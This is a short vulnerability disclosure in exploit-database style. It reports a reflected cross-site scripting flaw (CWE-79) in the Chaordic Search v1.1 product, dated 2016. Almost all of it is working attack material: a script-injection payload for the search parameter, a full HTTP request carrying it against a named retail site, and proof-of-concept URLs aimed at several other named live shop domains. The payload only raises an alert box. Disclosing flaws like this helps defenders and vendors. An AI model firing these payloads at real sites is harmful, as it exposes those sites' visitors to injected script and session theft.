[+] Cross Site Scripting on Chaordic Search v1.1

[+] Date: 09/12/2016

[+] Risk: LOW

[+] CWE number: CWE-79

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://www.chaordic.com.br/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Gnu/Linux

[+] Exploit : 

	http://busca.host/?q= [ XSS PAYLOAD ]

[+] Payload :

	?q="><script>alert('XSS Payload')</script>

[+] Example :

	GET /?q=%22%3E%3Cscript%3Ealert(%27OXSS Payload%27)%3C/script%3E HTTP/1.1
	Host: busca.submarino.com.br
	User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	DNT: 1
	Cookie: chaordic_anonymousUserId=anon-a1fa1360-bde5-11e6-afd4-a1f7c36320fb; cs_preferenceOrder=popularity; csDisplayType=grid
	Connection: keep-alive

[+] Poc :

	http://busca.saraiva.com.br/?q="><script>alert('XSS')</script>	
	http://busca.camisariacolombo.com.br/?q="><script>alert('XSS')</script>
	http://busca.dentalcremer.com.br/?q="><script>alert('XSS')</script>